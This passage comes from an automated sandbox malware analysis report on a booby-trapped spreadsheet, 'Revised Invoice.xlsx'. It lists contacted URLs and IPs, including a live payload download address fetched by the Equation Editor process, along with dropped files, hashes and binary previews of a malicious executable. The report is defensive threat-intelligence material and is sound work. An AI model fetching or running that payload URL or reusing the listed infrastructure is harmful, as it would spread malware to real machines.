                                          https://ca.sia.it/seccli/repository/CPS0regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.securetrust.com/SGCA.crl0regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0regasm_svchost.exe, 00000006.00000003.1135064302.00000000063D6000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.securetrust.com/STCA.crl0regasm_svchost.exe, 00000006.00000002.1169189252.000000000080F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.certicamara.com/certicamaraca.crl0;regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://YRNExv3jt4mlOyqgTcLy.comregasm_svchost.exe, 00000006.00000002.1170243625.000000000272A000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170492372.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170561076.00000000027EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.e-szigno.hu/RootCA.crt0regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.quovadisglobal.com/cps0regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://DynDns.comDynDNSnamejidpasswordPsi/Psiregasm_svchost.exe, 00000006.00000002.1170047314.00000000026B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.valicert.com/1regasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.e-szigno.hu/SZSZ/0regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0regasm_svchost.exe, 00000006.00000003.1135286709.000000000719E000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ocsp.quovadisoffshore.com0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ocsp.entrust.net0Dregasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://cps.chambersign.org/cps/chambersignroot.html0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ca.sia.it/secsrv/repository/CRL.der0Jregasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://sectigo.com/CPS0regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000002.1170516444.00000000027CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://107.174.138.192/ObliNMm2L89TSKT.exejEQNEDT32.EXE, 00000002.00000002.979873299.0000000003570000.00000004.00000800.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://crl.entrust.net/server1.crl0regasm_svchost.exe, 00000006.00000002.1170837218.0000000006334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://107.174.138.192/ObliNMm2L89TSKT.exeeEQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.ancert.com/cps0regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ca.sia.it/seccli/repository/CRL.der0Jregasm_svchost.exe, 00000006.00000003.1134833135.0000000006407000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.registradores.org/scr/normativa/cp_f2.htm0regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.signatur.rtr.at/de/directory/cps.html0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135190895.00000000071A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://107.174.138.192/ObliNMm2L89TSKT.exettC:EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://www.echoworx.com/ca/root2/cps.pdf0regasm_svchost.exe, 00000006.00000003.1134774303.0000000007182000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1134877706.000000000718D000.00000004.00000800.00020000.00000000.sdmp, regasm_svchost.exe, 00000006.00000003.1135220127.0000000007197000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://rca.e-szigno.hu/ocsp0-regasm_svchost.exe, 00000006.00000003.1135165865.0000000007179000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.netlock.hu/docs/regasm_svchost.exe, 00000006.00000002.1171153379.0000000007170000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.certplus.com/CRL/class1.crl0regasm_svchost.exe, 00000006.00000003.1134941251.00000000063C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://107.174.138.192/ObliNMm2L89TSKT.exe~EQNEDT32.EXE, 00000002.00000002.970423499.00000000002E4000.00000004.00000020.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.149.221.234
                                                          		bluemix.clUnited States
                                                          		397423TIER-NETUSfalse
                                                          107.174.138.192
                                                          		unknownUnited States
                                                          		36352AS-COLOCROSSINGUStrue

                                                          General Information

                                                          Joe Sandbox Version:35.0.0 Citrine
                                                          Analysis ID:673697
                                                          Start date and time: 26/07/202217:44:242022-07-26 17:44:24 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 7m 48s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:Revised Invoice.xlsx
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                          Number of analysed new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.adwa.spyw.expl.evad.winXLSX@6/30@5/2
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HDC Information:
                                                          • Successful, ratio: 3.7% (good quality ratio 2.7%)
                                                          • Quality average: 49.9%
                                                          • Quality standard deviation: 35.5%
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 87
                                                          • Number of non-executed functions: 17
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .xlsx
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                          • Attach to Office via COM
                                                          • Scroll down
                                                          • Close Viewer

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                                          • Excluded IPs from analysis (whitelisted): 8.248.147.254, 8.252.5.126, 8.238.190.126, 8.238.85.254, 8.238.191.126
                                                          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          17:45:41API Interceptor129x Sleep call for process: EQNEDT32.EXE modified
                                                          17:45:49API Interceptor819x Sleep call for process: regasm_svchost.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          104.149.221.234c33l2KS7k0.exeGet hashmaliciousBrowse
                                                            scan1962.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.MSILHeracles.36859.299.exeGet hashmaliciousBrowse
                                                                107.174.138.192invoice .xlsxGet hashmaliciousBrowse
                                                                • 107.174.138.192/OP.exe

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                c-0001.c-msedge.netRFQ-487937638.scr.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                5C06FEB446BFB3BA4455D92B452A153C44ED0E2724538.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                SecuriteInfo.com.W32.AIDetectNet.01.19537.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                SecuriteInfo.com.Variant.Tedy.139425.27755.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                N3tAPB35bC.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                O1sWTVa16g.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                U2ORGDN0Qn.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                6xfFjxyRXf.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                SecuriteInfo.com.Trojan.Packed2.44341.15154.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                bLJR1tSMfo.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                SecuriteInfo.com.Trojan.PackedNET.1449.13979.exeGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                2vMjDd8z34.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                R78g1mgKDg.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                YcbbEMLtwG.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                http://krogerbeerevents.comGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                tYN8vfM4dv.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                https://webdocsextcontrol.info/Get hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                102755.dllGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                SecuriteInfo.com.Exploit.Siggen3.34998.8568.xlsGet hashmaliciousBrowse
                                                                • 13.107.4.50
                                                                SecuriteInfo.com.Exploit.Siggen3.34998.30100.xlsGet hashmaliciousBrowse
                                                                • 13.107.4.50

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                AS-COLOCROSSINGUSorden de compra.xlsxGet hashmaliciousBrowse
                                                                • 198.46.132.183
                                                                NEW SUPPLIER REGISTRATION FORM.xlsxGet hashmaliciousBrowse
                                                                • 23.95.52.140
                                                                PI_0936567.xlsxGet hashmaliciousBrowse
                                                                • 198.46.132.183
                                                                R1qAzke02YGet hashmaliciousBrowse
                                                                • 206.123.95.80
                                                                ORDER_70127.xlsxGet hashmaliciousBrowse
                                                                • 23.95.52.140
                                                                Transaction Swift 0001.docxGet hashmaliciousBrowse
                                                                • 198.23.174.121
                                                                invoice .xlsxGet hashmaliciousBrowse
                                                                • 107.174.138.192
                                                                Purchase Order.jsGet hashmaliciousBrowse
                                                                • 192.227.128.163
                                                                invoice.exeGet hashmaliciousBrowse
                                                                • 192.3.194.246
                                                                Purchase Order #72422.jsGet hashmaliciousBrowse
                                                                • 192.227.128.163
                                                                Quote 6890251.exeGet hashmaliciousBrowse
                                                                • 198.46.132.178
                                                                PI.xlsxGet hashmaliciousBrowse
                                                                • 198.23.207.46
                                                                KOC BQ-2022-PROC-SI-68.xlsxGet hashmaliciousBrowse
                                                                • 198.12.89.157
                                                                attachment.exeGet hashmaliciousBrowse
                                                                • 107.172.13.154
                                                                RFQ-487937638.scr.exeGet hashmaliciousBrowse
                                                                • 23.94.82.24
                                                                Live.apkGet hashmaliciousBrowse
                                                                • 198.144.189.66
                                                                http://192.227.168.194/document/inv04/receipt.docGet hashmaliciousBrowse
                                                                • 192.227.168.194
                                                                Purchase Order.jsGet hashmaliciousBrowse
                                                                • 192.227.128.163
                                                                New Order.xlsxGet hashmaliciousBrowse
                                                                • 198.23.213.9
                                                                1FYzIEIGo9Get hashmaliciousBrowse
                                                                • 104.170.155.88
                                                                TIER-NETUSc33l2KS7k0.exeGet hashmaliciousBrowse
                                                                • 104.149.221.234
                                                                scan1962.exeGet hashmaliciousBrowse
                                                                • 104.149.221.234
                                                                SecuriteInfo.com.Variant.MSILHeracles.36859.299.exeGet hashmaliciousBrowse
                                                                • 104.149.221.234
                                                                mirai.m68kGet hashmaliciousBrowse
                                                                • 155.254.17.216
                                                                elmAKUWDRmGet hashmaliciousBrowse
                                                                • 104.149.220.211
                                                                y1vJPim631Get hashmaliciousBrowse
                                                                • 181.214.133.87
                                                                GlKt2OVVbMGet hashmaliciousBrowse
                                                                • 155.254.17.212
                                                                http://bluesail.cc/Webmail/webmail.php?email=sean@virtualintelligencebriefing.comGet hashmaliciousBrowse
                                                                • 198.37.123.126
                                                                PO#325342.xlsxGet hashmaliciousBrowse
                                                                • 198.37.123.126
                                                                https://jpseuroauto.com/.wwww/600/?uid=cst1@anaintercontinental-tokyo.jpGet hashmaliciousBrowse
                                                                • 192.154.228.33
                                                                http://macro-blue.cam/Webmail/1/webmail.php?email=meqatil@bein.comGet hashmaliciousBrowse
                                                                • 198.37.123.126
                                                                http://macro-blue.cam/Webmail/1/webmail.php?email=$emailGet hashmaliciousBrowse
                                                                • 198.37.123.126
                                                                Nw PN #23069746XVNXH8W630HXFRATQH.vbsGet hashmaliciousBrowse
                                                                • 192.154.229.64
                                                                armGet hashmaliciousBrowse
                                                                • 192.154.202.30
                                                                http://cosascoa.co.uk/Webmail/mail.php?email=reply-a4959751ea-6adc70f309-0a09@u.cts.vresp.comGet hashmaliciousBrowse
                                                                • 8.39.235.63
                                                                IWLU5S1avlGet hashmaliciousBrowse
                                                                • 192.154.226.10
                                                                sora.arm7Get hashmaliciousBrowse
                                                                • 155.254.17.211
                                                                Payment Copy.vbsGet hashmaliciousBrowse
                                                                • 192.154.226.233
                                                                nbJaKTZrdcGet hashmaliciousBrowse
                                                                • 155.254.17.203
                                                                9V6YXbvl2t.exeGet hashmaliciousBrowse
                                                                • 192.154.226.47

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                Download File
                                                                Process:C:\Users\Public\regasm_svchost.exe
                                                                File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):61712
                                                                Entropy (8bit):7.995044632446497
                                                                Encrypted:true
                                                                SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                MD5:589C442FC7A0C70DCA927115A700D41E
                                                                SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                Download File
                                                                Process:C:\Users\Public\regasm_svchost.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):3.1358915940078624
                                                                Encrypted:false
                                                                SSDEEP:6:kK4z+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:QzNkPlE99SNxAhUeE1
                                                                MD5:AFD9E3A010CC3E89D00DEA22F1A31703
                                                                SHA1:B26EE4341315F3B4B8EE92FFB7DD1E2A41BB8F43
                                                                SHA-256:CC70FFA600EFAEEFBA94CC27FAC0DBFF92C0756AD1001A881EE2A22F2773F922
                                                                SHA-512:61013F964BE3A892BE13C8503B23274C8F873D4D74AB69F95425CF164FAEA5BB553E84971359CDF75CCB44A79A57D38825C3ADE01C5221627495530B7CF88E25
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:p...... ........Z..DV...(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ObliNMm2L89TSKT[1].exe

                                                                Download File
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:downloaded
                                                                Size (bytes):696832
                                                                Entropy (8bit):7.590585064844322
                                                                Encrypted:false
                                                                SSDEEP:12288:OVcgR2iNDXR0GncRYx90+HKXE9i/KhCm9oD208AnZIoa6ew6J/O+B7UPzMIr4ujQ:2cW1rRnc+xVH0Qi/KUmMRdGTTwcO
                                                                MD5:D55AB6E5A705E970AD32977BE467294E
                                                                SHA1:286C13677D6E0EA6450D11028CCE45A3F5552A88
                                                                SHA-256:CF1D56BB74474AEEE555731DC0DDBFACF0E4CE6ADBA42070154A4E2AA157B532
                                                                SHA-512:54B8961ABD87848E087743A45511F8E8DC7152E632F0E66C63A56A649683BE6E10D851B6057DCCB16BD605E725775186CA7AC33B79CE0211B09ECE32FEE59EAA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: Metadefender, Detection: 38%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 73%
                                                                Reputation:low
                                                                IE Cache URL:http://107.174.138.192/ObliNMm2L89TSKT.exe
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.b..............P.............n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H..........T............................................................0..........(....*...0..).......r...p..r...p(....(....:.... c... .._a%..^E....5...........Q.......}.......a...8.....(....(....r...p(....,. ....%+. .m..%&. .\..Za+..-. ..6.%+. ?..T%&. .E.Za+.(..... >.P[8p...r)..p(..... R..eZ ^[&_a8T....r+..p(....(....-. .."_%+. ...Q%&. ].`HZa8&....(.... ..zg8...........s%...(....%.(.....(....*....0...............('...*..0...........u......-J 9F.. ....a%...^E........S....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\145781D7.jpeg

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                Category:dropped
                                                                Size (bytes):8815
                                                                Entropy (8bit):7.944898651451431
                                                                Encrypted:false
                                                                SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                MD5:F06432656347B7042C803FE58F4043E1
                                                                SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                Malicious:false
                                                                Reputation:high, very likely benign file
                                                                Preview:......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17B417F8.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):7482
                                                                Entropy (8bit):5.299545933702229
                                                                Encrypted:false
                                                                SSDEEP:192:FfQ+XJhT/Xgbx3EE+iwKEOZmLajEY3pqa:FIyJhTPoEEJwIoUfl
                                                                MD5:EC5BD3A7DCD0DAD4AA2BB10BC926C49E
                                                                SHA1:04896FCABAFB525F53E3D7CFB1BD5744960A2C93
                                                                SHA-256:E02900DB78FEDDA33402D93227D455303834B4B314A335F8C0DF7A0B8AC1F97F
                                                                SHA-512:DAD602EB21BC25C71AE37969004906F25A23B05171693DA61D7D0829A87377F8616E9DB34AB0ECCDF66BD6C88B7CAC05AB36A6C962EFF5DD6BE03868F617F9CF
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:.........M...^......W..........................M.................................................................................-............Oa.......-.......$.....}.6.}.6.>.......}...}.........fff.......-...............$.....|...|...=.......=...|...|..........Oa.......-...............$.....>...>.....M.D.......>...>.........fff.......-...............$... .>.5.>.7....... .>. .>...................-...............$.....>.......&.*.%.<...".S...>...>.........z.........-...............$.......7...9.O.E.O...........................-...............$.......#...#.O...O...........................-...............$.....H.......[.".A...~...H...H...................-...............$.....................v...........................-...............$.....T...............*.(.*.Q.....i...T...T...................-...............$.....A.........x.A...A...A...................-...............$... ...5...R.y.......o.4.;. ... .....................-...............$.........=.6.<.5.........D.....................

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FF35913.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):36030
                                                                Entropy (8bit):5.459766979023381
                                                                Encrypted:false
                                                                SSDEEP:768:o6V5iikV1CPDvzrM5PDocSG52nKS4IgfpQGoFkcxAAs793p7D02IFFGj8ce+HpsT:j7kAyh0u+xihxJSgPT/ib1gLlGUS
                                                                MD5:82AA885803CAAE18F9E663680BAD5A49
                                                                SHA1:A41A3D830796010FFF56236E815582A718D0F040
                                                                SHA-256:AEFFE968AD665AE904F4831FC243D3558504DC2AA6BE7EAAA0908A72FB2002FB
                                                                SHA-512:1A14C34E7A1EC017B0957AD1C32D531E9A35EA6D4C5947040238A01ECEFC7F1E651395C5394B1E6229D8522A881B22F71918E0549AB2EB176BE45EC19FFE3A29
                                                                Malicious:false
                                                                Preview:.....;...y..........U......TF..................;.......B.>...................-...................".....-...........................".....-.....................-...............$.B.....;...@.]...;...M...I...?...1...!.........................3.x./.z.&.................................&.t.E.k.f.j...o...~.............................*...=...R...a...q.#.../...;...F...Q...Z...a...g...l...q.$.t.5.v.G.x.Y.x.k.v...p...h...]...N...<...&.$...>.0.........................-...............-.......-.....................-...............$...%...'...'.~.&.y.$.u.2.l.@.d.N.].\.V.k.N.z.G...@...9...;...>...@...C...D...E...E...C...9...0...'......... ...2...D...V...h...z...............................................................!.{.,.u.6.v.@.u.J.s.S.o.\.j.f.e.o.`.x.\...Z...V...Q...K...E...@...;...8...5...1...-...-...............................j...\...O...B...3...$.....................................}...n...^.s.N.a.>.P...?.-.3.*.'.&...!.....................................l...T...<...$...#...!... ... .....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41DE942.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):36030
                                                                Entropy (8bit):5.459766979023381
                                                                Encrypted:false
                                                                SSDEEP:768:o6V5iikV1CPDvzrM5PDocSG52nKS4IgfpQGoFkcxAAs793p7D02IFFGj8ce+HpsT:j7kAyh0u+xihxJSgPT/ib1gLlGUS
                                                                MD5:82AA885803CAAE18F9E663680BAD5A49
                                                                SHA1:A41A3D830796010FFF56236E815582A718D0F040
                                                                SHA-256:AEFFE968AD665AE904F4831FC243D3558504DC2AA6BE7EAAA0908A72FB2002FB
                                                                SHA-512:1A14C34E7A1EC017B0957AD1C32D531E9A35EA6D4C5947040238A01ECEFC7F1E651395C5394B1E6229D8522A881B22F71918E0549AB2EB176BE45EC19FFE3A29
                                                                Malicious:false
